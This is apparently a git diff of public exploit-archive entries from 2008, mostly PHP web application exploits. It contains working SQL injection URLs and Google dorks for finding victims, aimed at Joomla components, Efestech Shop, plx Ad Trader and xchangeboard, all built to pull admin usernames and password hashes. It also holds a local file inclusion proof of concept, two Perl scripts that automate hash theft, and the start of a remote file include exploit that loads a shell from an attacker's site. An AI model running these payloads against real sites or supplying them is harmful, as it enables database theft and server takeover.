the server. + * + * @access public + * @param integer code 1(enabled) 0(disabled) + * @example $this->allowredirection(0) + * @example $this->allowredirection(1) + * + */ + function allowredirection($code) + { + if($code=='0') + $this->allowredirection=FALSE; + + elseif($code=='1') + $this->allowredirection=TRUE; + } + + + /** + * This function is called if + * allowredirection() is enabled. + * You don't have to call it. 
+ *
+ * @access private
+ * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
+ * @return string $this->get($this->last_redirection)
+ * @return string $this->recv;
+ *
+ */
+ function getredirection()
+ {
+ if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
+ {
+ $this->last_redirection = trim($codearr[2]);
+
+ if(!ereg('://',$this->last_redirection))
+ return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
+
+ else
+ return $this->get($this->last_redirection);
+ }
+ else
+ return $this->recv;
+ }
+
+
+ /**
+ * This function allows you
+ * to reset some parameters.
+ *
+ * @access public
+ * @param string func Param
+ * @example $this->reset('header')
+ * @example $this->reset('cookie')
+ * @example $this->reset()
+ *
+ */
+ function reset($func='')
+ {
+ switch($func)
+ {
+ case 'header':
+ $this->header = array();
+ break;
+
+ case 'cookie':
+ $this->cookie = array();
+ break;
+
+ default:
+ $this->cookiejar = '';
+ $this->header = array();
+ $this->cookie = array();
+ $this->allowredirection = '';
+ break;
+ }
+ }
+}
+
+?>
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5987.txt b/platforms/php/webapps/5987.txt
index c153119af..d4d9bc524 100755
--- a/platforms/php/webapps/5987.txt
+++ b/platforms/php/webapps/5987.txt
@@ -1,48 +1,48 @@
-Title: Efestech Shop v2.0 Sql İnjection Vuln
-
-==============================
-==================================
-
-[+] Author : Dr.Kacak
-[+] Special Thankz : KnockOut And All My Friends
-[+] System 0VerfL0WerZ Group & BuqX Team
-[+] Mail : BuqX [at] Hotmail [dot] com
-
-=================================================================
-
-Script : Efestech Shop v2.0
-Verz: 2.0
-Download : http://www.aspindir.com/indir/5479
-
-
-
-SQL attack ;
-
-http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
-
-Tables;
-
-ayarlar
-cat_eng
-cat_tr
-eng
-lisans
-mark_eng
-mark_tr
-product
-subcat_eng
-subcat_tr
-tr
-urun_resim
-
-
-
-###############################################################
-
-Example Bug Site :
-
-http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
-http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng
-http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr
-
-# milw0rm.com [2008-07-01]
+Title: Efestech Shop v2.0 Sql İnjection Vuln
+
+==============================
+==================================
+
+[+] Author : Dr.Kacak
+[+] Special Thankz : KnockOut And All My Friends
+[+] System 0VerfL0WerZ Group & BuqX Team
+[+] Mail : BuqX [at] Hotmail [dot] com
+
+=================================================================
+
+Script : Efestech Shop v2.0
+Verz: 2.0
+Download : http://www.aspindir.com/indir/5479
+
+
+
+SQL attack ;
+
+http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
+
+Tables;
+
+ayarlar
+cat_eng
+cat_tr
+eng
+lisans
+mark_eng
+mark_tr
+product
+subcat_eng
+subcat_tr
+tr
+urun_resim
+
+
+
+###############################################################
+
+Example Bug Site :
+
+http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
+http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng
+http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5988.txt b/platforms/php/webapps/5988.txt
index 8a74bd154..aa409083a 100755
--- a/platforms/php/webapps/5988.txt
+++ b/platforms/php/webapps/5988.txt
@@ -1,53 +1,53 @@
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@
-@ plx Ad Trader v3.2 SQL Injection Vulnerability
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@ Author: Hussin X @
-@ @
-@ Home : www.tryag.cc/cc @
-@ @
-@ email: darkangel_g85[at]Yahoo[DoT]com @
-@ hussin.x[at]hotmail[DoT]com @
-@ @
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@
-@ HomE script : http://plxwebdev.com
-@
-@ DeMo : http://plxwebdev.com/demos/plxadtrader
-@
-@
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@
-@
-@
-@
-
-ExPloiT :
-
-www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins--
-
-
-
-L!VE DEMO :
-
-USER
-
-http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
-
-PASSWORD
-
-http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
-
-
-@
-@
-@
-@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@
-@ @
-@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR @
-@ @
-@ str0ke / FAHD /Iraqihack / Silic0n @
-@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@
-@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@
-
-# milw0rm.com [2008-07-01]
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@
+@ plx Ad Trader v3.2 SQL Injection Vulnerability
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@ Author: Hussin X @
+@ @
+@ Home : www.tryag.cc/cc @
+@ @
+@ email: darkangel_g85[at]Yahoo[DoT]com @
+@ hussin.x[at]hotmail[DoT]com @
+@ @
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@
+@ HomE script : http://plxwebdev.com
+@
+@ DeMo : http://plxwebdev.com/demos/plxadtrader
+@
+@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@
+@
+@
+@
+
+ExPloiT :
+
+www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins--
+
+
+
+L!VE DEMO :
+
+USER
+
+http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
+
+PASSWORD
+
+http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
+
+
+@
+@
+@
+@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@
+@ @
+@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR @
+@ @
+@ str0ke / FAHD /Iraqihack / Silic0n @
+@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@
+@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5989.txt b/platforms/php/webapps/5989.txt
index 7d534c47b..b25547d00 100755
--- a/platforms/php/webapps/5989.txt
+++ b/platforms/php/webapps/5989.txt
@@ -1,49 +1,49 @@
-[+] Name : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability
-
-[+] Team : DarkMatter Crew
-
-[+] Crew website : WwW.SykoPainKilla.CoM
-
-[+] Author : SpK & His0k4
-
-[+] Contact : fatal.1.ty[at]hotmail.com[dot]com
-
-[+] D0rk : inurl:index.php?option=com_versioning
-
-
-
-[+] Expl0iT :
-
-http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--
-
-
-#
-#
-#
-#
-############################################
- #
-Visit our website www.sykopainkilla.com #
- #
- #
-#DarmMatter & SpK F0R3V3R #
- #
-############################################
-#
-#
-#
-#
-
-
-side note:
-versioning
-11.14.2006
-Thomas Papin
-
-This component is released under the GNU/GPL License.
-
-thomas.papin@free.fr
-www.joomprod.com
-1.0.2
-
-# milw0rm.com [2008-07-01]
+[+] Name : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability
+
+[+] Team : DarkMatter Crew
+
+[+] Crew website : WwW.SykoPainKilla.CoM
+
+[+] Author : SpK & His0k4
+
+[+] Contact : fatal.1.ty[at]hotmail.com[dot]com
+
+[+] D0rk : inurl:index.php?option=com_versioning
+
+
+
+[+] Expl0iT :
+
+http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--
+
+
+#
+#
+#
+#
+############################################
+ #
+Visit our website www.sykopainkilla.com #
+ #
+ #
+#DarmMatter & SpK F0R3V3R #
+ #
+############################################
+#
+#
+#
+#
+
+
+side note:
+versioning
+11.14.2006
+Thomas Papin
+
+This component is released under the GNU/GPL License.
+
+thomas.papin@free.fr
+www.joomprod.com
+1.0.2
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5990.txt b/platforms/php/webapps/5990.txt
index 8d9e43755..8dd68a880 100755
--- a/platforms/php/webapps/5990.txt
+++ b/platforms/php/webapps/5990.txt
@@ -1,20 +1,20 @@
- H-T Team { HouSSamix & ToXiC350 }
-=====================================================================
- Joomla Component mygallery Remote SQL Injection Exploit
-=====================================================================
-
-## AUTHOR : HouSSamix From H-T TeaM
-
-## Script : mygallery Joomla Component ( version unknown )
-
-## DorKs : inurl:index.php?option=com_mygallery "cid"
-
-## EXPLOIT :
-
-index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
-
-## Note : the number of columns can be diffrent .
-
-## GREETZ : CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers
-
-# milw0rm.com [2008-07-01]
+ H-T Team { HouSSamix & ToXiC350 }
+=====================================================================
+ Joomla Component mygallery Remote SQL Injection Exploit
+=====================================================================
+
+## AUTHOR : HouSSamix From H-T TeaM
+
+## Script : mygallery Joomla Component ( version unknown )
+
+## DorKs : inurl:index.php?option=com_mygallery "cid"
+
+## EXPLOIT :
+
+index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--
+
+## Note : the number of columns can be diffrent .
+
+## GREETZ : CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5991.txt b/platforms/php/webapps/5991.txt
index 5f9f1062c..c08015a58 100755
--- a/platforms/php/webapps/5991.txt
+++ b/platforms/php/webapps/5991.txt
@@ -1,33 +1,33 @@
-######################
- #
- # xchangeboard 1.70 final and lower
- #
- #
- ######################
- #
- #Bug by: haZl0oh #
- #Dork: "Powered by xchangeboard"
- #info:you have to be an registered user to use it like this !!!!
- #there should be a lot more vulns there ;)
- #
- #
- #
- # credentials like passwords are saved as cookies .... :D
- ##
- ###
- ##
- #
- #PoC:
- #http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
- #
- # #
- #
- #
- #######################
- #
- #Greetz to h0yt3r ,everiZzel & Mastermaefju
- #
- #######################
-#######################
-
-# milw0rm.com [2008-07-02]
+######################
+ #
+ # xchangeboard 1.70 final and lower
+ #
+ #
+ ######################
+ #
+ #Bug by: haZl0oh #
+ #Dork: "Powered by xchangeboard"
+ #info:you have to be an registered user to use it like this !!!!
+ #there should be a lot more vulns there ;)
+ #
+ #
+ #
+ # credentials like passwords are saved as cookies .... :D
+ ##
+ ###
+ ##
+ #
+ #PoC:
+ #http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
+ #
+ # #
+ #
+ #
+ #######################
+ #
+ #Greetz to h0yt3r ,everiZzel & Mastermaefju
+ #
+ #######################
+#######################
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5992.txt b/platforms/php/webapps/5992.txt
index 96f8b4045..1cc78673e 100755
--- a/platforms/php/webapps/5992.txt
+++ b/platforms/php/webapps/5992.txt
@@ -1,66 +1,66 @@
-======================================================================
- CMS little (index.php template) Local File Inclusion Vulnerability
-======================================================================
-
- ,--^----------,--------,-----,-------^--,
- | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
- `+---------------------------^----------|
- `\_,-------, _________________________|
- / XXXXXX /`| /
- / XXXXXX / `\ /
- / XXXXXX /\______(
- / XXXXXX /
- / XXXXXX /
- (________(
- `------'
-
-
-AUTHOR : CWH Underground
-DATE : 2 July 2008
-SITE : cwh.citec.us
-
-
-#####################################################
- APPLICATION : CMS little
- VERSION : 0.0.1
- VENDOR : N/A
- DOWNLOAD : http://downloads.sourceforge.net/littlecms/CMSLite.zip
-#####################################################
-
---- Local File Inclusion ---
-
------------------------------
- Vulnerable File (index.php)
------------------------------
-
-@Line
- 64: include $currentpage[template];
- 65: } else {
- 66: include $template.".tmpl.php";
-
----------
- Exploit
----------
-
-[+] http://[Target]/[cmslite_path]/index.php?template=[LFI]
-
-
-------
- POC
-------
-
-[+] http://[Target]/[cmslite_path]/index.php?template=../../../../../../../../boot.ini%00
-
-
- This exploit will open boot.ini in system file:
-
-[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
-
- You can change boot.ini to /etc/passwd%00 in linux OS.
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
-##################################################################
-
-# milw0rm.com [2008-07-02]
+======================================================================
+ CMS little (index.php template) Local File Inclusion Vulnerability
+======================================================================
+
+ ,--^----------,--------,-----,-------^--,
+ | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
+ `+---------------------------^----------|
+ `\_,-------, _________________________|
+ / XXXXXX /`| /
+ / XXXXXX / `\ /
+ / XXXXXX /\______(
+ / XXXXXX /
+ / XXXXXX /
+ (________(
+ `------'
+
+
+AUTHOR : CWH Underground
+DATE : 2 July 2008
+SITE : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : CMS little
+ VERSION : 0.0.1
+ VENDOR : N/A
+ DOWNLOAD : http://downloads.sourceforge.net/littlecms/CMSLite.zip
+#####################################################
+
+--- Local File Inclusion ---
+
+-----------------------------
+ Vulnerable File (index.php)
+-----------------------------
+
+@Line
+ 64: include $currentpage[template];
+ 65: } else {
+ 66: include $template.".tmpl.php";
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[cmslite_path]/index.php?template=[LFI]
+
+
+------
+ POC
+------
+
+[+] http://[Target]/[cmslite_path]/index.php?template=../../../../../../../../boot.ini%00
+
+
+ This exploit will open boot.ini in system file:
+
+[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+ You can change
boot.ini to /etc/passwd%00 in linux OS.
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
+##################################################################
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5993.txt b/platforms/php/webapps/5993.txt
index 34f059ab6..f8d897ce3 100755
--- a/platforms/php/webapps/5993.txt
+++ b/platforms/php/webapps/5993.txt
@@ -1,22 +1,22 @@
-/---------------------------------------------------------------\
-\ /
-/ Joomla Component Brightcode Weblinks Remote SQL injection \
-\ /
-\---------------------------------------------------------------/
-
-
-[*] Author : His0k4 [ALGERIAN HaCkEr]
-
-[*] Dork : inurl:com__brightweblinks
-
-[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid={SQL}
-
-[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
-[*] Example2 : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
-
-----------------------------------------------------------------------------
-[*] Greetings : All friends & muslims HaCkeRs...
-[*] Greetings2: http://www.dz-secure.com
- http://palcastle.org/cc
-
-# milw0rm.com [2008-07-02]
+/---------------------------------------------------------------\
+\ /
+/ Joomla Component Brightcode Weblinks Remote SQL injection \
+\ /
+\---------------------------------------------------------------/
+
+
+[*] Author : His0k4 [ALGERIAN HaCkEr]
+
+[*] Dork : inurl:com__brightweblinks
+
+[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid={SQL}
+
+[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
+[*] Example2 : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
+
+----------------------------------------------------------------------------
+[*] Greetings : All friends & muslims HaCkeRs...
+[*] Greetings2: http://www.dz-secure.com
+ http://palcastle.org/cc
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5994.pl b/platforms/php/webapps/5994.pl
index d92663012..ce5bcb1d4 100755
--- a/platforms/php/webapps/5994.pl
+++ b/platforms/php/webapps/5994.pl
@@ -1,63 +1,63 @@
-#!/usr/bin/perl -w
-
-# Joomla Component QuickTime VR v 0.1 Remote SQL Injection #
-########################################
-#[*] Found by : Houssamix From H-T Team
-#[*] H-T Team [ HouSSaMix + ToXiC350 ]
-#[*] Greetz : Mr.Al3FrItE & Islamic Security Team & Mounita20 & CoNaN and all musulmans hackers
-
-#[*] Component_Name: QuickTime VR
-#[*] Script_Name: Joomla
-#[*] Dork : index.php?option=com_vr
-########################################
-# QuickTime VR
-# Januari 2007
-# Bob
-# Pictura
-# bob@pictura-dp.nl
-# http://www.pictura-dp.nl/
-# 0.1
-
-
-system("color f");
-print "\t\t########################################################\n\n";
-print "\t\t# Viva Islam #\n\n";
-print "\t\t########################################################\n\n";
-print "\t\t# Joomla Component QuickTime VR Remote SQL Injection #\n\n";
-print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
-print "\t\t########################################################\n\n";
-
-use LWP::UserAgent;
-
-print "\nEnter your Target (http://site.com/joomla/): ";
- chomp(my $target=);
-
-$uname="username";
-$magic="jos_users";
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),2 from/**/".$magic."/**";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-
-print "\n[+] The Target : ".$target."";
-
-if ($answer =~ /(.*?)/){
-
- print "\n[+] Admin User : $1";
-}
-$host2 = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20password,2/**/from/**/jos_users--";
-$res2 = $b->request(HTTP::Request->new(GET=>$host2));
-$answer = $res2->content;
-if ($answer =~/([0-9a-fA-F]{32})/){
- print "\n[+] Admin Hash : $1\n\n";
- print "# Exploit succeed!
#\n\n";
-}
-else{print "\n[-] Exploit Failed...\n";
-}
-
-# codec by Houssamix From H-T Team
-
-# milw0rm.com [2008-07-02]
+#!/usr/bin/perl -w
+
+# Joomla Component QuickTime VR v 0.1 Remote SQL Injection #
+########################################
+#[*] Found by : Houssamix From H-T Team
+#[*] H-T Team [ HouSSaMix + ToXiC350 ]
+#[*] Greetz : Mr.Al3FrItE & Islamic Security Team & Mounita20 & CoNaN and all musulmans hackers
+
+#[*] Component_Name: QuickTime VR
+#[*] Script_Name: Joomla
+#[*] Dork : index.php?option=com_vr
+########################################
+# QuickTime VR
+# Januari 2007
+# Bob
+# Pictura
+# bob@pictura-dp.nl
+# http://www.pictura-dp.nl/
+# 0.1
+
+
+system("color f");
+print "\t\t########################################################\n\n";
+print "\t\t# Viva Islam #\n\n";
+print "\t\t########################################################\n\n";
+print "\t\t# Joomla Component QuickTime VR Remote SQL Injection #\n\n";
+print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
+print "\t\t########################################################\n\n";
+
+use LWP::UserAgent;
+
+print "\nEnter your Target (http://site.com/joomla/): ";
+ chomp(my $target=);
+
+$uname="username";
+$magic="jos_users";
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),2 from/**/".$magic."/**";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+
+print "\n[+] The Target : ".$target."";
+
+if ($answer =~ /(.*?)/){
+
+ print "\n[+] Admin User : $1";
+}
+$host2 = $target .
"index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20password,2/**/from/**/jos_users--";
+$res2 = $b->request(HTTP::Request->new(GET=>$host2));
+$answer = $res2->content;
+if ($answer =~/([0-9a-fA-F]{32})/){
+ print "\n[+] Admin Hash : $1\n\n";
+ print "# Exploit succeed! #\n\n";
+}
+else{print "\n[-] Exploit Failed...\n";
+}
+
+# codec by Houssamix From H-T Team
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5995.pl b/platforms/php/webapps/5995.pl
index fa430d2c7..53853d236 100755
--- a/platforms/php/webapps/5995.pl
+++ b/platforms/php/webapps/5995.pl
@@ -1,64 +1,64 @@
-#!/usr/bin/perl -w
-
-# Joomla Component is v 1.0.1 Multiple Remote SQL Injection
-# variables vuln : ( marka ) & ( motor )
-########################################
-#[*] Found by : Houssamix From H-T Team
-#[*] H-T Team [ HouSSaMix + ToXiC350 ]
-#[*] Greetz : Mr.Al3FrItE & Islamic Security Team & Mounita20 & CoNaN and all musulmans hackers
-
-#[*] Component_Name: is
-#[*] Script_Name: Joomla
-#[*] Dork : index.php?option=com_is
-########################################
-# is
-# 09.05.2006
-# MAXX MARKETING
-# by 2006 Maxx Marketing
-# klaus.huber@maxx-marketing.net
-# www.maxx-marketing.net
-# 1.0.1
-
-
-system("color f");
-print "\t\t########################################################\n\n";
-print "\t\t# Viva Islam #\n\n";
-print "\t\t########################################################\n\n";
-print "\t\t# Joomla Component Is v 1.0.1 multiple SQL Injection #\n\n";
-print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
-print "\t\t########################################################\n\n";
-
-use LWP::UserAgent;
-
-print "\nEnter your Target (http://site.com/joomla/): ";
- chomp(my $target=);
-
-$uname="username";
-$magic="jos_users";
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $target . "index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-
-print "\n[+] The Target : ".$target."";
-
-if ($answer =~ /(.*?)/){
-
- print "\n[+] Admin User : $1";
-}
-$host2 = $target .
"index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
-$res2 = $b->request(HTTP::Request->new(GET=>$host2));
-$answer = $res2->content;
-if ($answer =~/([0-9a-fA-F]{32})/){
- print "\n[+] Admin Hash : $1\n\n";
- print "# Exploit succeed! #\n\n";
-}
-else{print "\n[-] Exploit Failed...\n";
-}
-
-# codec by Houssamix From H-T Team
-
-# milw0rm.com [2008-07-02]
+#!/usr/bin/perl -w
+
+# Joomla Component is v 1.0.1 Multiple Remote SQL Injection
+# variables vuln : ( marka ) & ( motor )
+########################################
+#[*] Found by : Houssamix From H-T Team
+#[*] H-T Team [ HouSSaMix + ToXiC350 ]
+#[*] Greetz : Mr.Al3FrItE & Islamic Security Team & Mounita20 & CoNaN and all musulmans hackers
+
+#[*] Component_Name: is
+#[*] Script_Name: Joomla
+#[*] Dork : index.php?option=com_is
+########################################
+# is
+# 09.05.2006
+# MAXX MARKETING
+# by 2006 Maxx Marketing
+# klaus.huber@maxx-marketing.net
+# www.maxx-marketing.net
+# 1.0.1
+
+
+system("color f");
+print "\t\t########################################################\n\n";
+print "\t\t# Viva Islam #\n\n";
+print "\t\t########################################################\n\n";
+print "\t\t# Joomla Component Is v 1.0.1 multiple SQL Injection #\n\n";
+print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
+print "\t\t########################################################\n\n";
+
+use LWP::UserAgent;
+
+print "\nEnter your Target (http://site.com/joomla/): ";
+ chomp(my $target=);
+
+$uname="username";
+$magic="jos_users";
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $target .
"index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+
+print "\n[+] The Target : ".$target."";
+
+if ($answer =~ /(.*?)/){
+
+ print "\n[+] Admin User : $1";
+}
+$host2 = $target . "index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
+$res2 = $b->request(HTTP::Request->new(GET=>$host2));
+$answer = $res2->content;
+if ($answer =~/([0-9a-fA-F]{32})/){
+ print "\n[+] Admin Hash : $1\n\n";
+ print "# Exploit succeed! #\n\n";
+}
+else{print "\n[-] Exploit Failed...\n";
+}
+
+# codec by Houssamix From H-T Team
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5996.txt b/platforms/php/webapps/5996.txt
index 6bbff8959..d708dcf78 100755
--- a/platforms/php/webapps/5996.txt
+++ b/platforms/php/webapps/5996.txt
@@ -1,119 +1,119 @@
-#!/usr/bin/perl
-
-####################################################################################################
-#
-# phportal_1.2_Beta (gunaysoft.php) Remote File Include Vulnerability
-#
-# Discovered by : Ciph3r
-#
-# Class: Remote File Include Vulnerability
-#
-# exemplary Exp:
-# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=[shell]
-# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
-# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
-#
-# Remote: Yes
-#
-# Type: Highly critical
-#
-# Vulnerable Code: include($icerikyolu.$sayfaid.$uzanti);
-#
-# Download: http://sourceforge.net/project/showfiles.php?group_id=205263
-#
-# SP tanx4: Iranian hacker & Kurdish security TEAM
-#
-# sp TANX2: milw0rm.com & google.com & sourceforge.net
-#
-# Exploit: phportal.pl
-#
-# About phPortal :
-#
-# phPortal is a Content Management System. phPortal contains phpBB2 core and
-# phPortal shell. If you have a phpBB2 forum.You may upgrade to phPortal.
-#
-######################################################################################################
-
-use LWP::UserAgent;
-use LWP::Simple;
-
-$target = @ARGV[0];
-$shellsite = @ARGV[1];
-$shellcmd = @ARGV[2];
-$file = "sablonlar/gunaysoft/gunaysoft.php?uzanti=";
-
-if(!$target || !$shellsite)
-{
- usage();
-}
-
-header();
-
-print "Type 'exit' to quit";
-print "[cmd]\$";
-$cmd = ;
-
-while ($cmd !~ "exit")
-{
- $xpl = LWP::UserAgent->new() or die;
